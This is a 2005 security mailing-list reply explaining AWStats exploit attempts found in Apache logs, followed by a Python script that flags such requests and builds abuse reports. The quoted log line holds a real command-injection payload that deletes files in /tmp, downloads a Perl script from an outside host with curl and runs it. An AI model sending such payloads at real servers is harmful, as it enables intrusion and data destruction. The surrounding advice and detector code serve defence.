Security Basics mailing list archives
Re: GET //awstats.pl? in apache logs
From: FocusHacks <focushacks () gmail com>
Date: Mon, 24 Oct 2005 08:55:19 -0500
It's simply someone or some automated scanning script trying to exploit the AWStats script on your server. It could be a script kiddie that's simply running the attack against a wide range of IP Addresses including yours. It might also be a worm of some sort that's looking for a way to propagate itself.

Honestly, I wouldn't be too concerned about this as long as you're certain that you're up to date on patches and don't have too many extra things installed on your web site. It happens to all of us.

If you do have a lot of things installed on your site, such as phpMyAdmin, phpNuke, Xoops, and the like, I usually recommend changing the default path that they're installed in, which makes it more difficult for automated scanning scripts and/or skript kiddies to abuse, should an exploit ever be released for that software. Also, if you can, put non-public WWW scripts and applications in a directory with HTTP Authentication. My webalizer and phpMyAdmin directories are password protected, for instance.

If you continue to see attacks from the same (or similar) IP, then go to this page and type in the IP Address(es) that the attacks are coming from. It will give you ownership and contact info for the address. This is usually the attacker's ISP.

http://ws.arin.net/whois

When contacting them (typically via abuse () their-domain-name com), include as much detail as possible, including the log files attached (only relevant log file portions) and the time zone that the log file's date stamp is in. This will often help them determine which of their customers it is.

If the IP address seems to be from overseas, especially from Asia, good luck getting any response or action. I've found the best way to solve that problem is to firewall off the subnet that the attacks came from. However, I have been known to simply firewall off an entire class A (59.x.x.x and 61.x.x.x come to mind, both are allocated to Asia Pacific NIC).

Forgive the horrid colors, but this is a good page with a lot of well-known shady IP addresses and subnets:

http://www.unixhub.com/block.html

Cheers,
--Noah

On 10/21/05, Konstantine <listclient () gmail com> wrote:
> My apache logs show rows after rows of following, all from various IP addresses. This started a couple of days ago. I don't have awstats. Could somebody tell me what is that? Is there anything I should be doing?
>
> thanks.
> K.
>
> GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1

-- http://www.FocusHacks.com - The Ford Focus Modification Site!
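
One way to pull only the relevant log portions for an abuse report, with the time zone stated and repeat source subnets counted, as the message above suggests. This is an added example, not part of the original post: the log lines are constructed, the function names are hypothetical, and it assumes IPv4 clients and Apache's combined log format.

```python
import ipaddress
import re
from collections import Counter
from datetime import datetime, timezone
from urllib.parse import unquote

# Constructed sample lines (Apache combined log format, documentation IP ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [21/Oct/2005:03:12:01 -0500] "GET //awstats.pl?configdir=|echo%20;CONSTRUCTED;echo| HTTP/1.1" 404 289 "-" "-"
192.0.2.77 - - [21/Oct/2005:03:12:09 -0500] "GET //cgi-bin/awstats.pl?configdir=%7cecho%20;CONSTRUCTED;echo%7c HTTP/1.1" 404 297 "-" "-"
198.51.100.4 - - [21/Oct/2005:03:15:44 -0500] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Oct/2005:04:01:30 -0500] "GET /awstats/awstats.pl?config=example.org HTTP/1.1" 404 291 "-" "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) ')
# awstats.pl called with a configdir value that starts with a pipe, as in the
# request quoted in the thread. Matched against the URL-decoded request URI.
INJECT_RE = re.compile(r'awstats\.pl\?(?:[^#]*&)?configdir=\s*\|', re.IGNORECASE)

def find_awstats_injections(log_text):
    """Return one dict per request that targets awstats.pl with a piped configdir."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not (m and INJECT_RE.search(unquote(m["uri"]))):
            continue
        when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        hits.append({
            "ip": m["ip"],
            "subnet": str(ipaddress.ip_network(m["ip"] + "/24", strict=False)),
            "utc": when.astimezone(timezone.utc).isoformat(),
            "log_tz": m["ts"].split()[-1],
            # Anything but 404 means something answered at that path: check patch level.
            "served": m["status"] != "404",
            "raw": line,
        })
    return hits

def subnet_counts(hits):
    """Count hits per /24 so repeated attempts from one range stand out."""
    return Counter(h["subnet"] for h in hits)

def abuse_report(hits):
    """Only the matching log lines, preceded by the UTC offset the log uses."""
    zones = sorted({h["log_tz"] for h in hits})
    header = "Log timestamps use UTC offset(s): " + ", ".join(zones)
    return "\n".join([header] + [h["raw"] for h in hits])
```

A `served` value of `True` on any hit is the case worth investigating first, since it means the request did not end in a 404.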